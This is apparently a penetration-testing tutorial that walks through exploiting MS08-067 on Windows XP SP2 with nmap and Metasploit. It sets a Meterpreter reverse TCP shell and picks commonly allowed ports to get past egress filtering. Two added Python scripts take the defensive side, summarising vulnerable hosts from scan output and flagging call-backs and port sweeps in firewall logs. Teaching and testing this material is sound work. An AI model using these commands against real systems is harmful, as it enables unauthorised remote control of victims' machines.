Exploitation and Metasploit

If a vulnerable host has been discovered and identified it is time for the real deal. The Metasploit Framework contains hundreds of exploits. Running

show exploits

from msfconsole will display every exploit available in the Framework. Other valid parameters for the "show" command are all, encoders, nops, exploits, payloads, auxiliary, plugins and options.

Exploiting your target
We are going to attack a Windows XP SP2 machine with exploit MS08-067. To discover if the target machine is vulnerable to this exploit, we are going to use nmap and its script smb-check-vulns. Fire up your msfconsole and execute,

nmap -sS -A --script=smb-check-vulns -P0 192.168.1.5
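When the scan covers more than one host it is easier to read the results from nmap's XML output than from the console. The following Python script is an added example for this post (not the author's code); it assumes the scan above was also run with -oX so that the smb-check-vulns verdicts appear under each host's <hostscript> element, and the XML embedded below is a constructed sample in that shape, not a real scan.

```python
"""Summarise nmap smb-check-vulns verdicts from XML output (nmap ... -oX scan.xml).

Added example; assumes the NSE script reported per-host results under
<hostscript>. SAMPLE_XML is a constructed sample, not real scan output.
"""
import sys
import xml.etree.ElementTree as ET

# Constructed sample: one vulnerable host, one patched host, one host with no SMB result.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.1.5" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-check-vulns" output="&#10;  MS08-067: VULNERABLE&#10;  Conficker: Likely CLEAN&#10;  regsvc DoS: NOT VULNERABLE"/>
    </hostscript>
  </host>
  <host>
    <address addr="192.168.1.7" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-check-vulns" output="&#10;  MS08-067: NOT VULNERABLE&#10;  Conficker: Likely CLEAN"/>
    </hostscript>
  </host>
  <host>
    <address addr="192.168.1.9" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def parse_smb_check_vulns(xml_text):
    """Return {ip: {check_name: status}} for every host that produced smb-check-vulns output."""
    results = {}
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        ip = None
        for address in host.iter("address"):
            if address.get("addrtype") == "ipv4":
                ip = address.get("addr")
        if ip is None:
            continue
        for script in host.iter("script"):
            if script.get("id") != "smb-check-vulns":
                continue
            checks = {}
            # The script output is one "name: STATUS" pair per line.
            for line in script.get("output", "").splitlines():
                if ":" not in line:
                    continue
                name, status = line.split(":", 1)
                checks[name.strip()] = status.strip()
            results[ip] = checks
    return results


def vulnerable_hosts(results, check="MS08-067"):
    """Hosts whose status for `check` starts with VULNERABLE.

    startswith() is deliberate: 'NOT VULNERABLE' must not match.
    """
    return sorted(ip for ip, checks in results.items()
                  if checks.get(check, "").startswith("VULNERABLE"))


if __name__ == "__main__":
    # Usage: python smbvulns.py scan.xml   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    parsed = parse_smb_check_vulns(text)
    for ip in vulnerable_hosts(parsed):
        print(ip, "MS08-067:", parsed[ip]["MS08-067"])
```

Hosts that returned no smb-check-vulns block at all (port 445 closed, or the check was skipped) are left out of the result rather than reported as clean, so the patch-status inventory only contains verdicts the scanner actually produced.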

If your target machine is vulnerable, search for ms08_067_netapi and enable it,

use windows/smb/ms08_067_netapi

Now we need to select our payload. We will use the Windows-based Meterpreter reverse TCP payload. To select this payload execute,

set PAYLOAD windows/meterpreter/reverse_tcp

To view a list of available payloads for the exploit execute

show payloads

If everything goes well a connection will be created from the target machine back to your attacking machine. A reverse TCP payload lets the compromise succeed even when the target machine is behind a firewall or NAT and it is impossible to connect to a listening (bind) TCP port on it. After selecting the payload we have to specify our target exactly, because this exploit is specific to the operating system version, service pack and language. Execute

show targets

to see a list of possible exploit targets.

To select your target execute, for example,

set TARGET 4

Set the remaining options and type

exploit

When you are using a reverse TCP payload don't forget to close your firewall and check whether your router is blocking any port; otherwise you will not see a shell waiting for your commands even if the exploit was successful. If you are attacking a system on the Internet you will have to use your external IP address in the LHOST option. You should use port 80, 53, 8080 or 443 in the LPORT option: if the target machine is behind a firewall and outbound traffic is filtered, ports 80, 53, 8080 and 443 are the ones most likely to be allowed for outgoing connections, whereas the victim's firewall may drop any packet that leaves through a port other than 80, 53, 8080 or 443. Don't forget to configure your router to redirect all incoming traffic on port 443, 53, 8080 or 80 to the local IP address of your attacking machine.

Search for allowed ports automatically
If you find it hard to locate a port that is allowed through the firewall, Metasploit offers the command search ports. This payload searches for an open port by trying every available port for an outbound connection until it finds one that gets through. This process may take quite a long time.
If you manage to open one or more sessions you can list your active sessions by executing

sessions -l

To interact with an active session, issue the command

sessions -i num

where num is the number of the session. A Meterpreter shell will open and if we enter shell, we will jump into a Windows command line shell!
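The two previous sections describe exactly what a defender should look for in outbound firewall logs: a workstation opening a connection on a "universally allowed" port (80, 53, 8080, 443) straight to an Internet host instead of the sanctioned proxy or resolver, and a workstation walking through many destination ports to one host in a short time, which is what the all-ports search looks like from the egress side. The script below is an added example for this post (not the author's or the Metasploit project's code). The log format (space-separated timestamp, source, destination, destination port, action) and the allow-list of sanctioned egress hosts are assumptions; the log lines are constructed.

```python
"""Flag reverse-TCP call-backs on 'always allowed' ports in outbound firewall logs.

Added example. Assumed log format per line: "<ISO timestamp> <src> <dst> <dport> <ALLOW|DENY>".
SANCTIONED is an assumed site policy: the only hosts workstations may reach on these ports.
SAMPLE_LOG is constructed, not captured from a real device.
"""
from collections import defaultdict
from datetime import datetime

SANCTIONED = {                       # assumed egress policy (web proxy and internal resolver)
    80: {"10.0.0.10"},
    443: {"10.0.0.10"},
    8080: {"10.0.0.10"},
    53: {"10.0.0.53"},
}

SAMPLE_LOG = [
    "2012-08-01T10:00:01 10.0.5.21 10.0.0.10 443 ALLOW",    # normal traffic via the proxy
    "2012-08-01T10:00:02 10.0.5.21 10.0.0.53 53 ALLOW",     # normal DNS to the resolver
    "2012-08-01T10:00:05 10.0.5.33 203.0.113.9 443 ALLOW",  # call-back on 443 straight to the Internet
    "2012-08-01T10:00:06 10.0.5.33 203.0.113.9 443 ALLOW",
] + [
    # 10.0.5.40 walking ports 1..12 to a single host within seconds (all-ports style search)
    f"2012-08-01T10:01:{i:02d} 10.0.5.40 198.51.100.7 {i} DENY" for i in range(1, 13)
] + [
    "2012-08-01T10:01:13 10.0.5.40 198.51.100.7 443 ALLOW",  # the search finally found 443 open
]


def parse(lines):
    """Turn raw log lines into (timestamp, src, dst, dport, action) tuples."""
    events = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, dst, dport, action = line.split()
        events.append((datetime.fromisoformat(ts), src, dst, int(dport), action))
    return events


def unsanctioned_egress(events):
    """Allowed connections on a 'universal' port whose destination is not the sanctioned host."""
    hits = set()
    for _, src, dst, dport, action in events:
        if action == "ALLOW" and dport in SANCTIONED and dst not in SANCTIONED[dport]:
            hits.add((src, dst, dport))
    return sorted(hits)


def outbound_port_sweeps(events, min_ports=8, window_seconds=60):
    """(src, dst) pairs that touched >= min_ports distinct ports within window_seconds.

    Denied attempts count too: the sweep is visible precisely because most ports are blocked.
    """
    by_pair = defaultdict(list)
    for ts, src, dst, dport, _ in events:
        by_pair[(src, dst)].append((ts, dport))
    sweeps = []
    for pair, attempts in by_pair.items():
        attempts.sort()
        lo = 0
        for hi in range(len(attempts)):          # sliding time window over the attempts
            while (attempts[hi][0] - attempts[lo][0]).total_seconds() > window_seconds:
                lo += 1
            if len({p for _, p in attempts[lo:hi + 1]}) >= min_ports:
                sweeps.append(pair)
                break
    return sorted(sweeps)


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    for src, dst, port in unsanctioned_egress(ev):
        print(f"unsanctioned egress: {src} -> {dst}:{port}")
    for src, dst in outbound_port_sweeps(ev):
        print(f"outbound port sweep: {src} -> {dst}")
```

The first check is only as good as the allow-list: if workstations are permitted to reach arbitrary Internet hosts on 443, a reverse shell on that port is indistinguishable from browsing at the firewall, and the real control is forcing all web traffic through a proxy. The second check needs no allow-list at all, which is why the all-ports search is the noisier choice from the defender's point of view.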

This post is part of my article about metasploit which was originally published in PenTest Magazine, August issue.
